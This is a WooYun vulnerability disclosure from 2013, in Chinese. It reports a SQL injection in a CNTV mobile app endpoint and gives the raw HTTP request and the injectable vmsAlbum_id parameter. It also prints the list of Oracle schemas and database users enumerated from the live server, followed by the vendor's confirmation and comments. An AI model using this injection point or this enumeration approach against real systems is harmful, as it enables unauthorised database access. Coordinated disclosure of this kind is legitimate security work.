APP终结者10#中国网络电视台CNTV多款主要无线产品Sql注入多库

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-046137

漏洞标题：APP终结者10#中国网络电视台CNTV多款主要无线产品Sql注入多库

漏洞作者： zzR

提交时间：2013-12-16 17:36

修复时间：2014-01-30 17:37

公开时间：2014-01-30 17:37

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2013-12-16：细节已通知厂商并且等待厂商处理中
2013-12-16：厂商已经确认，细节仅向厂商公开
2013-12-26：细节向核心白帽子及相关领域专家公开
2014-01-05：细节向普通白帽子公开
2014-01-15：细节向实习白帽子公开
2014-01-30：细节向公众公开

简要描述：

每天晚上准时收看新闻联播，接受教育，积极进步。在19:29:45的时候，主持人会说：获取更多资讯，敬请关注央视微博、微信、新闻客户端……
其实这个漏洞系列title不重要，重要是在这些产品中产生的各种各样类型的问题。
这是从一个比较边缘的产品出发，最后还是会涉及到核心产品。

详细说明：

从央视的几款主要产品出发，主要涉及央视新闻、CNTV、CNTV Cbox直播大全、5+VIP等都会有相同的app请求。
从一个不起眼的app出发IPandaCam，注入到核心产品数据

GET /iphoneInterface/cntv/getVideoListBySort.json?vmsAlbum_id=VSET100167308821&page=1&pageSize=20 HTTP/1.1
Host: hot.app.cntv.cn
Proxy-Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: zh-cn
Connection: keep-alive
Pragma: no-cache
User-Agent: LovePanda/1.0.1 CFNetwork/672.0.8 Darwin/14.0.0

vmsAlbum_id存在注入

漏洞证明：

current db&user

dbs

[*] APEX_030200
[*] CMSUSER
[*] CTXSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] SYS
[*] SYSTEM
[*] VMSUSER
[*] XDB

其中cmuser 174张表

users

database management system users [36]:
[*] ANONYMOUS
[*] APEX_030200
[*] APEX_PUBLIC_USER
[*] APPQOSSYS
[*] CMSSEL
[*] CMSUSER
[*] CNTVSEARCH
[*] CTXSYS
[*] DBSNMP
[*] DIP
[*] EXFSYS
[*] FLOWS_FILES
[*] GOLDENGATE
[*] MDDATA
[*] MDSYS
[*] MGMT_VIEW
[*] OLAPSYS
[*] ORACLE_OCM
[*] ORDDATA
[*] ORDPLUGINS
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] OWBSYS_AUDIT
[*] SI_INFORMTN_SCHEMA
[*] SPATIAL_CSW_ADMIN_USR
[*] SPATIAL_WFS_ADMIN_USR
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] VMSSEL
[*] VMSUSER
[*] WMSYS
[*] XDB
[*] XS$NULL
[*] YXG

未继续深入

修复方案：

来乌云把爱带回家

版权声明：转载请注明来源 zzR@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2013-12-16 17:46

厂商回复：

非常感谢，我们将及时修复漏洞!

漏洞评价：

2013-12-16 18:21 | 大胖子 ( 普通白帽子 | Rank:122 漏洞数:12 )

悄悄关注之
2013-12-16 18:30 | zzR ( 核心白帽子 | Rank:1382 漏洞数:122 | 收wb 1：5 无限量收 [平台担保])

@大胖子 @小胖子亲皂友？
2013-12-16 18:48 | 小胖子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)

@大胖子尼玛打击伪劣产品人人有责！！！
2013-12-16 18:49 | 寂寞的瘦子 ( 普通白帽子 | Rank:242 漏洞数:53 | 一切语言转汇编理论)

@小胖子 @zzR @大胖子搞笑

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-046137

漏洞标题：APP终结者10#中国网络电视台CNTV多款主要无线产品Sql注入多库

相关厂商：中国网络电视台

漏洞作者： zzR

提交时间：2013-12-16 17:36

修复时间：2014-01-30 17:37

公开时间：2014-01-30 17:37

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 zzR@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-046137

漏洞标题：APP终结者10#中国网络电视台CNTV多款主要无线产品Sql注入多库

相关厂商：中国网络电视台

漏洞作者： zzR

提交时间：2013-12-16 17:36

修复时间：2014-01-30 17:37

公开时间：2014-01-30 17:37

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2013-046137"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 zzR@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：